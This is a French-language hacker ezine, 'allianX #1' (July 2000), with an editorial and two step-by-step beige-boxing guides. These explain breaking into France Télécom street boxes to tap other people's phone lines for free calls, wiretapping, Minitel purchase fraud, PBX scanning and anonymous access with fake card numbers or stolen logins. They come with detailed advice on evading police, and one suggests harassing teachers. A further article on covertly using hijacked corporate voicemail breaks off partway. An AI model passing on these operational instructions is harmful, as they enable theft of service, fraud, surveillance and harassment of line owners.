---><>>> Version Windows.....800*600 pour une meilleure lecture... <<<><---

allianX #1                                                     --== Lundi 10 Juillet 2000 ==--
Team allianX


                                              		 
				             ___  ___                    
				            |   ||   |                  ___          ___ 
				   /\\      |   ||   |                  \  \        /  /
		              / \ \     |   ||   |                   \  \      /  / 
			       /   \ \    |   ||   |           __     __\  \    /  /                        	                  /     \ \   |   ||   |__   ___  /  \   /   \  \  /  /
	                 /   /\  \ \  |   ||   |__| /   \ |   \  |   |\  \/  /
		          /   /__\  \ \ |   ||   |__ /  /\ \|    \ |   | \    /
	               /    ___    \ \|   ||   |  |  /__\ \     \|   | /                                      	              /____/   \    \ \   ||   |  |   ___  \  |\     |/  /\  \
	              \____/    \    \ \  ||   |  |  /   \  \ | \    |  /  \  \
                               \    \ \_||___|___\/     \  \|  \   | /    \  \
			              \    \ \                 \__\   \__//      \_/
				         \____\_\                       /  /         
                                          			    \_/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			SoMMairE							  allianX #1	
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

****************************************************************************************
**    SuJeT ..........................................................AuTeUr          **
**************************************************************************************** 
**														  **	
**    Edito ......................................................... allianX         **
**    Le Beige Boxing ............................................... 720             **
**    Le Beige Boxing ............................................... Sauron*         **
**	Petit coup de gueule  ce sujet ............................... Ad-Tonnou	  ** 
**	transfert de fichier par vmb .................................. Tuniz2000       **
**    Hack de rpondeurs de portable ................................ Ad-Tonnou       **
**    Le concept d'open source ...................................... Redfire         **
**	Scurit Linux ................................................ [-AhfeeLinuX-]  **
**    Scurit Linux ................................................ Sauron          **
**	Le Mirc Scripting ............................................. Ft-One          **
**    Programmation shell et backdoor sous linux .................... Sauron          **
**	Obtenir des infos sur une cible ............................... Sauron          **
**    Introduction au TCP/IP ........................................ Ad-Tonnou       ** 
**    Tutorial turbo pascal ......................................... Ad-Tonnou       **
**	un deuxieme tutorial Turbo Pascal ............................. Ad-Tonnou       **
**	Le Corewar ? hum...'sont fous ces ricains ..................... Tuniz2000	  **
**    Pas payer ses amendes ??? tiens, tiens ........................ 720             **
**	Le mot de la fin .............................................. AllianX         ** 		
**                                                                                    **	
****************************************************************************************



*: Suite  une mauvaise organisation de notre part...on a deux diffrents articles sur le Beige Boxing...mais c'est cool cela vous donnera deux points de vue diffrents...

Dsol ce mois ci on a presque pas de hacking...le mois prochain on va se concentrer sur le hacking et Linux....
Vous tes intrss par la team ?
Vous pouvez me joindre sur la vmb : 3651 0800 010 800,,*4540 (ma bal est la 4540)

PS --> hors de question d'integrer des personnes dans le groupe me proposant des articles du genre hack par ftp/spoofing irc/anonymail....
On s'est un peu precipits sur la fin, mais on a essaye tout de meme de faire du mieux qu'on pouvait, j'espere que ce mag vous plaira, si oui, on fera le numro 2, sinon on arrete...

PS (bis) --> Dsol mais pris de court je n'ai pu corriger l'orthographe des derniers articles
PS (bis) --> merci  Paranoid pour son joli ascii

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			eDiTo                                             allianX #1  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


	Je lis dans la majorit des zines que j'ai l'occasion de consulter : 
		"Nous n'avons nullement l'intention et la prtention de remplacer les grands classiques comme noroute..."
Et je profite de cet dito pour pousser un petit coup de gueule...

	Tout d'abbord je tiens a dire que ce n'est pas avec des raisonnements de ce genre que nous pourrons faire bouger la scne underground francophone, qui, comme vous l'aurez surement remarqu (je n'en doute point), va trs mal :
Les lamers bouffent les newbies et prennent la grosse tte, les lites nous quittent, les bons se font de plus en plus rares...et je parle pour l'underground sous tous ses aspects (phreaking, hacking, cracking...), heureusement il reste un domaine o nous exellons: le lamering...
Je vais reprendre une phrase de mon ami Zarconen (mais si, je sais que tu m'aimes bien) qui rsume parfaitement la situation de la scne :
	"Ne trouvez vous pas cela trange qu'il y ait de plus en plus de personnes s'interressant au hacking et de moins en moins de hackers ???"
Vous l'aurez compris, on a tous les droits de penser que la scne francophone est morte...

	De plus, un aspect a entierement detruit mon espoir de renaissance de cette susdite scene: la majorite des zines sont morts....
Petites comparaison rvlatrice: je compte prs d'une trantaine de zines sur mon HD ayant t diffus entre janvier et juin 98, un peu moins pour l'anne 99...Si l'anne 99 aura t le rodage voire la snilit de la scne francophone, l'anne 2000 sonne son glat: je compte 5 zines tout au plus sortis durant cette mme priode...
 
	Mi Mars, Hackoff22 sortait, et souffla sur la flamme, si petite soit elle, d'esperance du renouveau de la scene, puis est n le zine qui se nomme RTC mag, exellente qualit...
Ainsi, pourrais-je esprer cette renaissance ??? (je parle beaucoup de moi, ce n'est pas de l'gosme mais tout simplement je pense ne pas etre le seul a penser de la sorte...)

	Pour en revenir a ma premiere remarque, arretons de nous retourner pour voir les depouilles de nos ains et les contempler (noroute etc...), mais prenons plutot exemple sur eux et grimpons encore plus haut...
Les ains sont l pour donner l'exemple aux cadets, mais viend un temps ou ceux la mmes doivent essayer de surpasser ces dits ains, tout seuls, c'est a le progres...
	
J'espere de tout coeur que ce temps est arriv,  nous de nous envoler....

	De surcroit, je tiend  prciser, et cela n'engage que moi, qu' mon gout les NoRoute et autres NoWay ont dja t dpasss...par des mags tels que HackOff ou bien Cryptel (que je trouve vraiment exellents...les gars, je pense tres fort a vous, et courage...) 

	
	C'est donc apres cette petite introduction que je vous presente ce nouveau zine, fruit comme vous vous en doutez d'un long travail (et oui, c'est pas en regardant les oiseaux voler que ce zine s'est ecrit)!
	J'espere qu'il vous plaira et que vous apprecierez le soin particulier que nous avons consacr  l'originalit des articles qui le composent...

En sperant que ce soit le premier d'une longue dynastie, j'ai le plaisir de vous prsenter allianX #1

PS ---> Je remercie de tout coeur ceux qui comme nous essaye de se bouger le cul (je dis bien essaye...)  faire avancer la scene du mieux qu'ils le peuvent et j'encourage ceux qui n'osent passer le pas lecture/ecriture...

Je finirais par ce bout de dialogue que j'ai copi dans un chan sur dalnet sur #hackers, chez les ricains...
<Ad-Tonnou> The french scene is not dead...
<Ralph> The french scene ?? whats dat ?? ;)
<okion> A new film ?? hehehe...

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Le Beige Boxing                                             720  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

++++++++++
+SOMMAIRE+
++++++++++  

   I) INTRO.  
   II) BRANCHEMENTS.
   III) DIVERS MOYENS D' UTILISATIONS.	
   IV) A SAVOIR POUR NE PAS SE FAIRE CHOPER     (A LIRE IMPERATIVEMENT)	  	  
   V) RISQUES
_______________________________________________________________________________________________

      *************
      * I) INTRO *
      *************

	Bon on commence, tout d' abord cet article est rserv aux dbutants mais s'avre quand mme complet sur le beige boxing par rapport  d' autre zines.

QU EST CE QUE LE BEIGE BOXING??? : C est en fait le fait de se connecter en drivation sur la ligne telephonique de quelqun d autre, donc d utiliser sa ligne sans rien payer...
Pour cela il y a vraiment rien de plus facile, voila l'inventaire de ce qu il vous faut:

   --> Un appareil utilisant une ligne telephonique (telephone, ordi portable avec modem....) le tout ayant une alim independante. (pas se secteur mais pile, batterie....)
   --> Un cable de sortie de tlphone bidouill (explication plus loin)
   --> Une parfaite connaissance du sujet donc lisez bien tout l article.

Vous me direz pour se brancher sur une ligne il faut bien la trouver quelquepart non?
Oui!!! je suis intelligent hein????   :-)
Or nous amis Francs Taxeurs (FT)(Nd ad-tonnou --> trop fort) sont cons (bon a on le savait, mais bon ca fait plaisir de se le dire et redire) 
Ils sont tellements cons que pour rhausser le courant des lignes de tel (eh oui l effet de joule est avec nous ), ils ont parsem partout des bornes o les lignes de tel des particuliers sont a nu (en petit fils quoi)
Elles sont reconnaissables par le signe FT sur leurs facades /!\ a ne pas confondre avec EDF GDF....
On trouve gnralement ces bornes sous trois formes diffrentes:

   -Les plus classiques, des sortes de boitiers plus ou moins grand (Nd ad-tonnou --> pas plus que 25*25 cm) qui peuvent tre en bas des potauts (rare) ou en haut. Notons que pour les acrobates comme moi celles en haut de poteaux en betons de EDF sont accessibles grace  leurs marches encastres. Mais attention  la chute. 
POUR LES OUVRIR: elles sont souvent ouverte en haut des potaus et en bas pareil sinon il faut forcer comme un barbare
Sur certaines bornes nouvelles il y a une sorte de poussoir rouge en bas il faut alors soulever la borne tout en appuyant sur le bouton. 

-Il y a aussi des bornes qui ressemblent aux bornes de kilometrage (comme sur les routes)
 par leur forme, elle sont blanches.POUR LES OUVRIRS: PIED DE BICHE  la bourrin (Nd ad-tonnou --> oui, la hache marche pas mal aussi)
 
-Et pour finir il y a les bornes sous terre semblables  des plaques d'gouts mais rectangulaires (il y a le logo FT dessus). Elles sont trs lourdes.
POUR LES OUVRIR: soulever avec pied de biche grace aus petits trous prvus a cet effet.    
_______________________________________________________________________________________________
      
	 *********************
       * II) BRANCHEMENTS * 	
       *********************

Bon je pense que l appareil vous l'avez, par contre le cable bidouill je sais pas donc voila ce qu il faut pour le faire:
   ---> Prenez un cable tout con de tlphone (RJ11) il est deja sur votre tlphone, eh oui! les tlphones ont un cable!!! non serieux?? (le mieux est d'avoir un tel avec une prise femelle RJ11 comme ca on peut l'utiliser comme un tlphone normal en changeant le cable avec un normal)
   ---> 3 pinces crocos 
   ---> Un fer  souder 

Bon on a tout alors c est facile on dnude la sortie du cable (on coupe le fils quoi)
pour arriver en gros a ca:	
                                             ---------
prise de tel]-------[cable telephonique]----x---------
	                                       ---------
	 
et l on voit quoi?? 3 fils, eh oui les trois fils du tel
(en fait 2 sont utiles et le troisieme que sur certaines lignes.)
Je ne dirai rien sur les couleurs des fils car elles changent et il ne faut pas s' y fier.
Une fois ceci fait, on soude les 3 pinces crocos aux 3 fils	
                                        ------<
    ---------<---=fil tel <=pince croco 
						    ------<
.. Et voil un beau cable tout neuf.
On va pouvoir se brancher sur une ligne en dnudant sans couper les fils de tel de quelqun d autre, et apres on
n aura plus qu a se connecter en drivation avec les pinces crocos (simple quoi). 

AVANT IL FAUT TESTER LE CABLE !!!
Pour cela faite le chez vous (en dmontant votre prise de tel et essayer pour voir quels sont les 2 fils utiles. 
puis diffrencier les avec des couleurs. (vous remarquerez que si vous inverser les fils dans les branchements de votre prise de tel, cela fera sonner votre autre tlphone (si vous en avez deux) 

/!\ EN GROS si vous vous  gourez lors de votre branchement pendant un session beige le tel de votre victime sonnera (pas genial comme discretion surtout vers 2h du mat)
Voila maintenant votre cable marche et vous savez quels fils marchent donc on va mouvoir commencer les choses serieuses.
_______________________________________________________________________________________________
_______________________________________________________________________________________________
       ************************************
       *III) Divers moyens d utilisation *
       ************************************ 

       ###############################################################################################
#ATTENTION : Les techniques decrites ici doivent etre appliques APRES avoir lu la section IV #  ###############################################################################################
	
	A) La plus rapide faons d utiliser le beige c'est de brancher votre tlphone sur une borne et d'utiliser la ligne
normalement: 

Il faut donc ouvrir une borne et trouver des fils o se brancher (souvent en couple) l on dnude les fils sans les couper (cela tres chiant, il faut grater le cahoutchouc isolant)
Je vous conseil un banal cutter pour gratter l'isolant. Bon et ben apres on met les pinces crocos sur les fils et on verifie q'on a la tonalit. Non?? alors vite on dbranche et on essaye une autre combinaison car ca peut sonner chez la victime. bon une fois qu'on a la tonalit on peut alors telephoner gratos!!!! 

MAIS ATTENTION, VU QUE C'EST ILLEGAL ON PEUT SE FAIRE CHOPER POUR EVITER CELA:
   *Ne jamais appeller quelqun que vous connaisser (Bah oui a restreint l'utilisation, je sais) 
POURQUOI: tout simplement que si la victime s'aperoit du piratage de sa ligne (il y en a qui sont maniaques avec les factures dtailles mme pour 10fr a 3h du mat ils le voient) il va porter plainte et l les filcs vont voir qui vous avez appell et aprs....cuisinage....
Si jamais vous appellez car vous etes vraiment con (je repete a ne jamais faire) surtout le gars que vous appeller ne doit pas vous rappeller juste apres o mme 3h apres.) car l vous etes vraiment grill. 
Donc /!\ (ceci marche aussi bien avec les portables.)
Mais alors quelle utilit et ben pas grand chose: a part les canulars (bof bof), les numeros de culs a 5f/mn (bof bof)
Enfin tout ce qui est anonyme.		

	B)Viens ensuite une des utilisation la mieux du beige box: le minitel
POUR CELA il faut un ordinateur portable avec une carte modem et un mulateur minitel et une batterie d'assez longue dure.
Mme procedure pour le cable sauf que bien sur ici il faut un cable de modem  dnuder. Je sais, c'est con de le preciser.
On a donc un beau minitel a utiliser. Et ce qui est bien c est que avec le minitel on ne sais pas o vous tes all.
Je m explique: sur la facture dtaill de la victime il y aure marqu 3615 3617 3614... MAIS pas 3617 "euridile" pour vrifier la bonne sant de FT.
Quelle utilit? et bien minitel de cul. (Nd ad-tonnou --> quel obcd ce 720)
MAIS LE PLUS INTERRESSANT  c'est les serveurs d achats du type 3617 SETH*AX , SEL ...
Le principe: on commande des articles comme des jeux, des tlphones portable, du hardware....
et on reste connect le temps de payer en communication telephonique ( 5.57/mN).
Eviron 9h pour 1000Fr oui je sais c est des arnaqueurs car 60 * 5.57 * 9 = 3007Fr
De toutes faons, on s'en balance on paye rien...
Je precise que les commandes peuvent tre efectues en plusieurs fois avec un mot de passe (heuresement).
Donc vous allez sur un de ces serveurs et vous commander et voil 2 jours aprs vous avez votre truc.
Notons que les colis sont le plus souvent expedis en colissimo et il vous faut donc sigenr un reu (donc une preuve contre vous) Bon mais l on peut pas se faire nicker me direz vous puisque on sait pas sur quel serveur vous etes aller donc votre adresse est bien  l'abri sur le serveur et il y a aucune preuve.
Et bien SI il y a un risque de se faire choper: les serveurs d achat comme ceux l sont parfois surveills par un organisme dont je ne connais pas le nom. En gros ils voient qui est connect sur le serveur, depuis combien de temps.... 
Ils peuvent tout voir quoi y compris votre adresse de livraison, donc si ils voient que vous connecter tout le temps  2h du mat pendant 2h(la dure de votre batterie) a chaque fois,   ils vont peut etre se demander ce qui se passe et apres ils pourront dbarquer chez vous pour vrifier si vous avez bien achet legalement l objet, donc attention!!

Moi perso je vous conseille de commander des petits trucs genre carte de recharge mobicarde ou SFR 144F et vous les revendez 100F enfin voila quoi. Mais je ne connais personne qui se soit fait choper comme a, en fait je ne suis pas sure  100% que ces Men In Black du minitel existent vraiment, mais je vous le dis au cas o.   

(Nd Ad-tonnou ---> autre solution, trouvez une maison de vacance inhabite ou alors une maison abandonne et squattez y la boite aux lettres, vous recevez, signez ce qu'il doit etre sign et barrez vous...Ne jamais utiliser la meme boite aux lettres...)

	C)Encore un autre utlisation:
SCANNER des PBX sur des num azurs: Eh oui vous savez que de nombreux num vert propose des VMB et des PBX(plus rare)
l a va pour les scannez car c est gratuit mais les num azurs ou indigo ou violet eo rouge fushia????
Et bien aussi mais bon on n a pas que ca a faire de scannez des numero payants donc on le fait a partir d'une beige box et si on trouve un outdial c est cool car pour appelez en national... c est tjs plus conomique que le tarif normal.
Bon vous savez que vous pouvez le faire manuellement ou automatiquement avec un logiciel du type phonetag..... 
	
	D)ALLEZ SUR INTERNET mais l attention!!!!! ne faites pas les cons, ne vous connectez pas avec votre compte sinon videmment, vous etes grill, ben oui rflechissez:
VICTIME:  3h du mat il y a eut un appel de 2h sur le ************ = je porte plainte
FLICS: vont voir que ce numro correspond  un bruit du genre "psshhhhhhhttt, bruiuuuuuuu" vont se renseigner sur le serveur correspondant  ce numro  allo? qui c'est connect  3h du mat ?? : Mr HACKER2000  (votre login) et d'o?? Du numero de la victime
et la vous etes grill et salut votre libert.
Donc il faut vous connect anonymement ou sur le compte de quelqun d autre.
COMMENT??? soit en fesant des heures gratuites de par exemple AOL avec un faux num de CB et en vous dsabonnant avant 1 mois.
(EN DONNANT bien sur un faux nom adresse.... mais en les gardant pour se dsabonner en les appelant.). Ou alors vous pouvez aussi le faire sur le compte du quelqun d autre en ayant son login et mot de passe. Ca j explique pas, c'est marqu dans plein de zines
	
	E) surveiller la ligne de la victime en faisant un petit montage tout con avec un petit enregistreur ou meme en achetant des appareils speciaux (100f dans micro achat) qui enregistrent automatiquement tout appel sur la ligne.

	Enfin il y a vraiment plein de trucs, je vous ai expliqu que les plus courants.

*******************************************************************************
VI)ATTENTION POUR NE PAS SE FAIRE CHOPER!!! / QU EST CE QUE VOUS RISQUER??? **
******************************************************************************

	D abord il faut que vous apprenniez a savoir si la ville est au courant que des petits malins piratent des lignes et si ils vous cherchent. Donc pour savoir si ils vous cherchent il suffit de par exemple mettre un petit bout de scotch sur les box, et si deux semaines apres il n y a plus les scotchs alors l logique, il vous recherchent ou au moins sont au courant de vos agissement et donc ont avertis les flics!!!!   	        		      
Bon pour pas vous faire pecho dj il faut changer de box au maximum, alterner quoi, n'allez pas tout le temps sur la mme box quoi!! sinon vous etes vraiment con.

N'appelez jamais un pote, ca sert  rien de faire une box pour appeller un pote q habite  3km merde!!

N'allez jamais sur le net avec un compte  vous.

Ne dites a personne que vous faisez ca (Nd ad-tonnou --> PITOYABLE !!! on dit "vous faites"). Si les flics dbarquent chez vous because vous avez fait une commande sur le minitel alors je vous conseille de faire genreque c'est un gars dans la rue que vous ne connaissez pas qui vous a propos, genre un dileur quoi, je sais c'est un vieille feinte mais bon c'est toujours a, enfin je sais pas faites comme vous le sentez mais je vousconseille de prevoir le coup parce que si ils debarquent chez vous  l'improviste c'est clair que vous serez pas quoi faire...c est clair. Mais pour viter a il vous suffir de ne jamais donner votre adresse, donnez plutot celle d un gars qui une fois le colis reu vous paiera avec un tarif special (un gros bouffons quoi). de toutes facon reflechissez bien avant de vous lancer la dedans parce que cest chaud.

Surtout si vous avez d'autres ides n'hesitez pas  me les communiquer. BON vous risquez une grosse amendes et un bon paquet d'annes  Fleury... VOILA CA CALME HEIN!! ben oui ca va!!
Pour plus de renseignements  ce sujet, allez sur www.phreakon.fr.st, site d'une team qui s'est spcialis dans le phreaking... 




=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Le Beige Box							  Sauron	
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Nd ad-tonnou --> Vous allez avoir deux points de vue diffrents: celle de 720 qui s'y connait bien sur le beige boxing et celui de Sauron, plus naf, aprs cela, si on me dit encore que le beige box marche pas...

                  ##### Comment Phreaker une ligne en mois de deux #####

	Je tient avant toute chose a dire que le phreak est une chose extremement simple et qui marche a tous
les coups. Lorsque l'on a la tonalit on se rend compte a quel point sont mal faits les reseaux tlphoniques.
Je n'ai aucune connaissance particulire dans les tlcoms et pourtant c'est si simple....
	Il vous faut trouver les bornes france tlcoms pour pouvoir les pirater, elles se trouvent partout dans toutes les rues (sauf quand les cables sont souterrains mais quasiment tout le tps ce n'est pas le cas).
Selon les rgions, ou les quartiers elles sont en hauteur (accroches au poteau) ou basses. Chez moi, elles sont partout basse :o) Il y a plusieurs types de bornes, certaines sont dans une matire ressemblant au crpis, inutile d'essayer de les ouvrir vous n'y arriverez pas, ou alors vous vous ferez remarquer! Les plus courantes font 30 cm de largeur pour 20 de haut ( approximatif ), elles sont blanche et un tlphone est reprsenter dessus mais il n'est pas tres visible . Ces bornes l sont fixes par une vis en bas. En utilisant la maniere forte, elle pte a tous les coups, sinon c'est pas dur de trouver la bonne cl... Pettez en une qui est plus  l'card que les autres, regardez a l'interieur, il y a des sortes de dominos en plastique (non conducteur). Tous ne sont pas utiliss, chaque domino correspond  une ligne tlphonique. Le phreak peut servir pour ecouter quelqu'un, ou pour se servir de sa ligne.
En vous branchant dessus vous obtenez le meme resultat que si vous rajoutez un tlphone dans votre maison :
vous pouvez tre a plusieurs au telephone mais ne pouvez appeler deux personnes differentes en meme temps puisqu'il n'y a qu'une ligne. Les lignes tlphonique viennent de sous les dominos,ce sont de gros cable noir d'ou sortent deux fils qui vont tout direct dans les dominos... Avec un briquet ( c'est le plus rapide ) brulez ces fils, de maniere a faire fondre
le plastique, cela les dnude. Maintenant vous n'avez plus qu'a vous branchez dessus.
	MATERIEL : J'appelerai Prise Femmelle la prise dans laquelle vous branchez vos telephone chez vous.
Il vous faut un cable de telephone, avec une prise femelle au bout. A l'autre extremiter mettez des pince croco.
*** Si vous n'avez pas de prise femelle : c'est pas un drame mais c'est plus pratique d'en avoir comme ca on raccorde ce que l'on veut au bout ( pc portable, telephone, etc .... ). Dans ce cas faites comme precedent et bidouillez vos deux fils avec les deux fils de la prise mle du telephone ou du pc portable (pas dur du tout ).
	Voila, mettez vos pince croco, branchez ce que vous voulez sur la prise femelle, c'est a dire tout a fait normalement et verifiez que vous avez la tonalit, si c'est le cas,  moins d'tre dans le 16ieme a Paris, n'abusez pas trop qd meme, il y en a qui paye, et puis si ils ont la facture detailler et qu'ils grillent, ils risquent d'appeller France Telecom...
Dans ce cas, les personnes que vous avez appeller risquent d'avoir des probleme (questionnement, etc...). Ca peut etre pratique pour harceler la pire des races : les profs !! GrrRR, je les detestes presque tous !! Sinon, pour se connecter pepere (Nd Ad-Tonnou --> ma mre est prof) toute la nuit, ou bien faire des conneries en etant certains de ne pas etre retrouver..
	#### NOTE #####
	Je sais que c'est debile mais on sais jamais !!! Si vous vous connectez, n'utilisez pas un compte que vous avez deja utilisez de chez vous ou d'ailleurs, sinon vous vous ferez retrouver et l ca risque d'aller tres mal !!
	#### EON  #####
Bon, voila, je peux vous assurer que ca marche  tous les coup et c'est rapide, suffit de reperer les lieux, c'est mieux si c'est un quartier que vous connaissez, prenez vos precautions qd meme !!!
	
Sauron
petit remerciement a mon pote BUD, "merci gars".

Nd ad-tonnou --> encore une fois, nous sommes dsols pour les deux articles sur le beige box...

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			CouP dE GueULe						  ad-tonnou	
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


<ad-tonnou> Qui pratique le Beige Boxing ici ??
<XXXXXXXXX> Arf!
<ad-tonnou> quoi arf ???
<XX> lol
<ad-tonnou> quoi qu'est ce que j'ai dit ??!
<XXXXXXXXX> tu le fais exprs ou quoi ?? Les box a marche plus en France !!!
<XX> clair...en plus avec le beige box les communications sont gratuites que pour tes potes!!! c'est naz..
<ad-tonnou> ...no comment...



HHo !!! Y'en a marre !!!
Cela m'arrive tous les jours....des pov' abrutis qui sous pretexte d'avoir lu dans un pov' zine que les box ne marchaient plus en france le crie sous tous les toits sans reflchir...reflchir, capacit de penser indpendemment de ce que disent les autres...
He!! Cela vous arrive de sortir un peu ???
Bordel je vois pas pourquoi quand on dmonte une borne et qu'on se branche dessus cela ne marcherait pas....vraiment n'importe quoi !!!

<XX> clair...en plus avec le beige box les communications sont gratuites que pour tes potes!!! c'est naz..
A ce commentaire si dbile je vais rpondre un truc ---> ESCUSE !!!
C'est de la black box que tu parles pov' pomm...

En plus je vous ferai remarquer que le rseau tlphonique Franais n'a pas t chang depuis des annnes...donc ce qui marchaient avant marche toujours....
Ce sont les moyens de reprage qui ont volu...la black box marche toujours...sauf que c'est hyper tracable c'est tout...

Avant de parler de beige box...on s'informe les gars...et on sort! On essaye soi-mme avant de se ridiculiser...
Le pire dans cet exemple c'est que c'est moi qui suis pass pour un pomm....

Autre exemple...la Spy box...une dixaine de boxes se montent directement sur le tlphone...vous avez chang de tlphone ces dernires annes ??? Alors!!! Sombres idiots...!

Pour plus de precission sur les boxes ---> www.phreakon.fr.st   

Les prochaines remarques de ce genre seront logues, et j'hsiterai plus  donner les noms....

Vraiment des kriss d'idiots....lisez les deux articles sur le beige box....
arf!
--== ad-tonnou pour vous servir ==--

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
			Transfert de Fichier Par VmB 							  Tun!Z2000=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                                          ___             _____
		**************************     /   |   - --- --| ___ |
		*     File transfert     *    |0  _|   -- - - -| ___ |
		*                        *    |8 /      -- -- -| ___ |
		*        on VMB          *    |0 |    - -- - --|_____|
		*                        *    |0 |
		*      by Tun!Z2000      *    |x |       S  E  N  D
		*                        *    |x |      F  I  L  E  Z
		*      Mail me at :      *    |x |         F  O  R
		*                        *    |x |       F  R  E  E
		*   Tuniz2000@yahoo.com  *~~~~|x  \_    _____
		*                        *~~~~|x   |   | ___ |- --- --
		**************************     \___|   | ___ |-- - - -
                                                       | ___ |-- -- -
                                                       |_____|- -- - --

	La lecture de cet article implique que vous savez ce que vous risquez si jamais vous dcidez de mettre ceci en application,  savoir que l'utilisation illgale d'une VMB peut etre gratifie d'un gros PV ou d'une longue visite guide  Fleury-Mrogis si vous vous fates prendre.
	C'est mon premier article diffus a grande echelle (plus de 3 personnes :) alors je sais pas si je vais tre assez clair dans mes propos ou si vous allez etre largus au bout de trois lignes mais je vais faire de mon mieux.


	  I) La VMB

	    1) Prsentation
	    2) Choix de la VMB
	    3) Protocoles de transfert

	 II) Le systeme SSTV

	    1) Fonctionnement thorique
	    2) Application

	III) Le protocole RTTY

	    1) Fonctionnement thorique
	    2) Application

	 IV) Zi end


***********************************************************************
	  I) La VMB

	    1) Prsentation

	Bon alors, ceux qui ont dj phreak un peu savent ce qu'est une VMB (Nd ad-tonnou --> Vocal Message Box).
Pour ceux qui savent pas, rapidement une VMB c'est un systeme de messagerie vocale qui sert pour toute une entreprise, chaque personne avec son repondeur sur la mme VMB. Une VMB, c'est facile  phreaker, mais pour a lire les Noroute et les Noway, je suis pas la pour parler de a. En thorie,  moins d'avoir des grosses quantit de messages  recevoir, ou d'aimer discuter en differr, le phreak de VMB est pratique mais ne sert  rien d'autres. Pour le transfert de fichier, contrairement  ce que l'on peut entendre, la VMB peut servir : c'est pas parceque la VMB ne peut pas recevoir de message via une ligne comme un modem depuis le Web que le HTTP et le FTP sont les seuls protocoles de transfert qui existent!

	    2) Choix de la VMB

	Tout d'abord, prennez une VMB en numero vert, parceque ca sert a rien de passer par la VMB si c'est pour casquer un max de thunes (autant passer par l'adresse mail c'est plus simple et moins cher et pis c'est plus lgal). Ensuite, choisissez plutt une grosse bote parceque ca sera moins visible sur les factures FT de la bote (ben vi, ca  prend du temps d'envoyer des fichiers et un message de plus de deux minutes est toujours suspect). Evitez pour la meme raison le transfert le jour (imaginez que le proprio de la boite utilise a envie de voir ses messages pile  ce moment (Nd ad-tonnou --> pas si c'est TA boite, c'est  dire si tu mets un pass  toi...)), ou utilisez une boite vocale libre, mais mme faites le la nuit quand meme (enfin apres 9 heures du soir c'est bon).
Astuce : FT nous offre plein de VMB ! NON ? Si ! Sur le 3611, tapez Numro vert, et hop une soire de scanning s'impose

	    3) Protocoles de transfert

	Le protocole RTTY est un protocole de transfert sur les ondes radios de donnes informatiques, et le systeme SSTV est un systeme de transmission d'images de tout les formats.  (A noter que l'arme franaise utilise encore de temps en temps le protocole RTTY pour le transfert donnes)

***********************************************************************

	 II) Le systeme SSTV

	    1) Fonctionnement thorique

	Le systeme SSTV est un systeme de transmission via les ondes radios de. Pour information, ce systeme date de 1958. A l'epoque il servait de moyen de transmission d'images en noir en blanc avec une frquence "Blanc", une frquence "noire" et plein de frquences "Niveau de gris". Aujourd'hui, avec 3 balayage successifs, le SSTV permet l'envoi d'images couleurs. SSTV signifie SlowScanTeleVision, et pour les interesss, on capte beaucoup de donnes SSTV en BLU (bande latrale unique) sur 14.230  14.235 MHz. Mais bon on est pas la pour parler radio, mais SSTV. Bon alors pour convertir une image de numerique  sonore le plus simple est d'utiliser un logiciel qui le fait pour nous. Sous Zindoz, il y a Win95SSTV, sous Dos avec SoundBlaster, ya SoundBlasterSSTV, pour linux j'ai pas trouv :( mais ca doit bien exister je desespere pas. Bon on lance son programme et on charge son image que l'on converti (bouton Transmit pour Win95SSTV) et la miracle, y'a un drole de bruit qui sort des enceintes du micro ! Reglez aussi le protocole qui permet de definir la resolution des images : vous pouvez avoir de tres bonnes resolutions en protocole AVT (pour Amiga Video Transmission), ou des qualits plus ou moins acceptables avec Robot ou Martin M1. Les images peuvent etre code de quelques secondes  quelques minutes. 

	    2) Application

